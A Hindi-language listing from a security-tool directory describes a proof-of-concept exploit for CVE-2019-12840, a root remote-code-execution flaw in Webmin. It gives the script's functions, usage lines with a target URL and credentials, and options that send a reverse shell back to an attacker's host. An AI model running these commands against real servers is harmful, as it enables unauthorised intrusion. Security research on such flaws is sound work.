Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/pol-ruiz/poc-cve-2019-12840
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubpol-ruiz/poc-cve-2019-12840

PoC-CVE-2019-12840

यह CVE-2019-12840 भेद्यता का अपना और बुनियादी प्रूफ ऑफ कॉन्सेप्ट है जो आपको root में RCE देता है।

रिपॉजिटरी देखें
62 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Webmin में CVE-2019-12840 के लिए Exploit

यह रिपॉजिटरी एक Python स्क्रिप्ट है जो Webmin में CVE-2019-12840 भेद्यता का शोषण करती है।

विवरण

स्क्रिप्ट Webmin सर्वर में लॉगिन करने का प्रयास करती है और फिर CVE-2019-12840 भेद्यता का शोषण करती है। स्क्रिप्ट कई कमांड-लाइन तर्क स्वीकार करती है, जिसमें Webmin सर्वर में लॉगिन करने के लिए उपयोगकर्ता नाम और पासवर्ड, सर्वर का URL, सर्वर का पोर्ट, रिवर्स शेल के लिए लोकल पोर्ट और सर्वर पर निष्पादित करने के लिए एक कमांड शामिल है।

उपयोग

इस स्क्रिप्ट का उपयोग करने के लिए, आपको कम से कम उपयोगकर्ता नाम, पासवर्ड और Webmin सर्वर का URL प्रदान करना होगा। यहाँ स्क्रिप्ट का उपयोग करने का एक उदाहरण है:

python exploit.py -U username -P password -u http://localhost:10000 -lhost 10.x.x.x -lport 443

कोड का विवरण

इस रिपॉजिटरी में Python स्क्रिप्ट निम्नलिखित रूप से संरचित है:

  1. मॉड्यूल आयात: स्क्रिप्ट की शुरुआत में इसके संचालन के लिए आवश्यक विभिन्न Python मॉड्यूल आयात किए जाते हैं। इनमें HTTP अनुरोधों के लिए requests, कमांड-लाइन तर्कों को संभालने के लिए argparse, base64 एन्कोडिंग और डिकोडिंग के लिए base64, और HTML विश्लेषण के लिए BeautifulSoup शामिल हैं।

  2. फंक्शन परिभाषाएँ: स्क्रिप्ट कई फंक्शन परिभाषित करती है:

  • CVE_2019_12840(url,auth_base64,cmd): यह फंक्शन एक विशिष्ट पेलोड के साथ एक विशिष्ट URL पर POST अनुरोध करता है और प्रतिक्रिया की जाँच करता है।
  • login(username,password,url): यह फंक्शन प्रदान किए गए उपयोगकर्ता नाम और पासवर्ड के साथ Webmin सर्वर में लॉगिन करने का प्रयास करता है।
  • exploit(sid,url,cmd): यह फंक्शन Webmin सर्वर पर CVE-2019-12840 भेद्यता का शोषण करने का प्रयास करता है।
  • b64revshell(lhost,lport): यह फंक्शन base64-एन्कोडेड रिवर्स शेल उत्पन्न करता है।
  1. कमांड-लाइन तर्क प्रबंधन: स्क्रिप्ट कई कमांड-लाइन तर्क स्वीकार करती है, जिसमें Webmin सर्वर में लॉगिन करने के लिए उपयोगकर्ता नाम और पासवर्ड, सर्वर का URL, सर्वर का पोर्ट, रिवर्स शेल के लिए लोकल पोर्ट और सर्वर पर निष्पादित करने के लिए एक कमांड शामिल है।

  2. एक्सप्लॉइट का निष्पादन: यदि स्क्रिप्ट को एक स्वतंत्र प्रोग्राम के रूप में निष्पादित किया जाता है (एक मॉड्यूल के रूप में आयात किए जाने के बजाय), तो यह Webmin सर्वर में लॉगिन करने का प्रयास करेगी और फिर एक्सप्लॉइट को निष्पादित करेगी।

प्रोग्राम सहायता

स्क्रिप्ट कई कमांड-लाइन तर्क स्वीकार करती है। यहाँ स्क्रिप्ट का उपयोग करने का एक उदाहरण है:

python3 CVE-2019-12840.py -h

यह प्रोग्राम की सहायता प्रदर्शित करेगा, जिसमें निम्नलिखित शामिल है:

  _______      ________    ___   ___  __  ___        __ ___   ___  _  _    ___                                      
 / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \      /_ |__ \ / _ \| || |  / _ \                                     
| |     \ \  / /| |__ ______ ) | | | || | (_) |______| |  ) | (_) | || |_| | | |                                    
| |      \ \/ / |  __|______/ /| | | || |\__, |______| | / / > _ <|__   _| | | |                                    
| |____   \  /  | |____    / /_| |_| || |  / /       | |/ /_| (_) |  | | | |_| |                                    
 \_____|   \/   |______|  |____|\___/ |_| /_/        |_|____|\___/   |_|  \___/                                     
                                                                                                                    
                           by CyberMonkey                                                                              
                                                                                                                    
             Webmin <= 1.910 RCE (Authorization Required)                                                           
                                                                                                                    
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -c "id"                                 
usage: python CVE-2019-12840.py -u https://10.10.10.10 -U matt -P Secret123 -lhost <LOCAL_IP> -lport 443            
                                                                                                                    
                                                                                                                    
usage: CVE-2019-12840.py [-h] -U USERNAME -P PASSWORD -u URL [-p PORT] [-lport LPORT] (-c CMD | -lhost LHOST)

options:
  -h, --help    show this help message and exit
  -U USERNAME   username
  -P PASSWORD   password
  -u URL        target url
  -p PORT       target port
  -lport LPORT  local port for reverse shell
  -c CMD        command to execute
  -lhost LHOST  Send back a reverse shell at port 443

चेतावनी

यह स्क्रिप्ट एक सुरक्षा एक्सप्लॉइट है और इसका उपयोग केवल वैध उद्देश्यों जैसे कि पैठ परीक्षण या सुरक्षा अनुसंधान के लिए किया जाना चाहिए। इसका उपयोग अवैध गतिविधियों के लिए नहीं किया जाना चाहिए। इसके अलावा, यह स्क्रिप्ट CVE-2019-12840 के प्रति संवेदनशील Webmin सर्वरों के साथ उपयोग के लिए डिज़ाइन की गई है, इसलिए यह Webmin के सभी संस्करणों के साथ काम नहीं कर सकती है।

टूल डाउनलोड करें